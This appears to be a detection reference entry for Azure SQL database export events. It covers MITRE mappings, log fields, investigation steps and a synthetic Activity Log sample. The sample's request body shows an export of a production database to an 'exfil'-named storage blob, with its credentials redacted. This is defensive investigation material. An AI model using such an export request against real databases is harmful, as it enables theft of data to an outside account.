Microsoft.Sql/servers/databases/export/action
Microsoft.Sql/servers/databases/export/action
Event
Initiates an asynchronous export. A BACPAC contains database schema and data; it is not a transactional backup or transaction-log archive. Valid database/storage authorization and service connectivity are required. For transactional consistency, Microsoft recommends no writes during export or exporting a transactionally consistent database copy.
Security Context
Unauthorized export can collect database contents (T1213.006). Transfer to an adversary-controlled cloud account can additionally support T1537, but destination ownership and completed transfer must be established. HTTP 202 proves acceptance, not a completed artifact or download.
Log Source
Azure Activity Log, Administrative category, with operationName.value: Microsoft.Sql/servers/databases/export/action. Correlate status, subStatus, and final resource state; accepted asynchronous requests may still fail. Request bodies and HTTP details are optional and export-dependent.
Key Fields
| Field | Investigation value |
|---|---|
caller, claims, authorization | Recorded actor and authorization context; verify effective permissions. |
resourceId, correlationId | Exact target and related operations. |
status, subStatus | Outcome, including acceptance versus final completion. |
properties.requestbody, httpRequest | Submitted configuration or request URL where available; secret material may be omitted. |
What to Investigate
- Confirm the recorded outcome and compare actor, target, and timing with the approved workflow.
- Verify export approval, database access, storage authorization type, destination ownership, and network configuration.
- Follow the export operation to completion and confirm the resulting blob and data scope without exposing secrets.
- Correlate destination reads and actual transfer; distinguish portable export from complete backup/recovery coverage.
Sample Event
Synthetic scenario. The request illustrates a SAS-authorized BACPAC destination with credentials replaced by placeholders. It is not executable as written. The hostname does not prove attacker ownership; the accepted response does not prove export completion.
Exact field presence, payload nesting, identity/session details, and timestamp formatting remain unverified against captured logs. Names and illustrative identifiers do not prove intent or downstream activity.
{ "authorization": { "action": "Microsoft.Sql/servers/databases/export/action", "scope": "/subscriptions/20000000-0000-4000-8000-000000000001/resourceGroups/rg-occamy-pipeline/providers/Microsoft.Sql/servers/sql-occamy-prod-server/databases/sqldb-occamy-events" }, "caller": "draco@fantasticlogs.cloud", "channels": "Operation", "claims": { "appid": "04b07795-8ddb-461a-bbee-02f9e1bf7b46", "ipaddr": "203.0.113.66", "name": "Draco Malfoy", "http://schemas.microsoft.com/identity/claims/objectidentifier": "30000000-0000-4000-8000-001010011010", "puid": "1003200000000666", "http://schemas.microsoft.com/identity/claims/tenantid": "10000000-0000-4000-8000-000000000001", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn": "draco@fantasticlogs.cloud", "http://schemas.microsoft.com/identity/claims/wids": "e8611ab8-c189-46e8-94e1-60213ab1f814", "uti": "sqlExp221ExampleUtid01", "ver": "1.0" }, "correlationId": "90000000-0000-4000-8000-000100010000", "description": "", "eventDataId": "90000000-0000-4000-8000-000100010001", "eventName": { "value": "EndRequest", "localizedValue": "End request" }, "category": { "value": "Administrative", "localizedValue": "Administrative" }, "eventTimestamp": "2026-04-15T18:46:11.7218012Z", "level": "Informational", "operationId": "90000000-0000-4000-8000-000100110101", "operationName": { "value": "Microsoft.Sql/servers/databases/export/action", "localizedValue": "Export SQL Database" }, "resourceGroupName": "rg-occamy-pipeline", "resourceProviderName": { "value": "Microsoft.Sql", "localizedValue": "Microsoft.Sql" }, "resourceType": { "value": "Microsoft.Sql/servers/databases", "localizedValue": "Microsoft.Sql/servers/databases" }, "resourceId": "/subscriptions/20000000-0000-4000-8000-000000000001/resourceGroups/rg-occamy-pipeline/providers/Microsoft.Sql/servers/sql-occamy-prod-server/databases/sqldb-occamy-events", "status": { "value": "Accepted", "localizedValue": "Accepted" }, "subStatus": { "value": "Accepted", "localizedValue": "Accepted (HTTP Status Code: 202)" }, "submissionTimestamp": "2026-04-15T18:46:12.2402185Z", "subscriptionId": "20000000-0000-4000-8000-000000000001", "tenantId": "10000000-0000-4000-8000-000000000001", "properties": { "statusCode": "Accepted", "serviceRequestId": null, "eventCategory": "Administrative", "entity": "/subscriptions/20000000-0000-4000-8000-000000000001/resourceGroups/rg-occamy-pipeline/providers/Microsoft.Sql/servers/sql-occamy-prod-server/databases/sqldb-occamy-events/export", "message": "Microsoft.Sql/servers/databases/export/action", "hierarchy": "10000000-0000-4000-8000-000000000001/20000000-0000-4000-8000-000000000001", "requestbody": "{\"storageKeyType\":\"SharedAccessKey\",\"storageKey\":\"<REDACTED-SAS-TOKEN>\",\"storageUri\":\"https://flcdracoexfil666.blob.core.windows.net/exfil/sqldb-occamy-events.bacpac\",\"administratorLogin\":\"flcadmin\",\"administratorLoginPassword\":\"<REDACTED-PASSWORD>\",\"authenticationType\":\"SQL\"}" }, "relatedEvents": []}Sources
MITRE ATT&CK Mapping
Tactics: Collection Exfiltration
- T1213.006 — Databases — Adversaries may leverage databases to mine valuable information. These databases may be hosted on-premises or in the cloud (both in platform-as-a-service and software-as-a-service environments).
- T1537 — Transfer Data to Cloud Account — Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.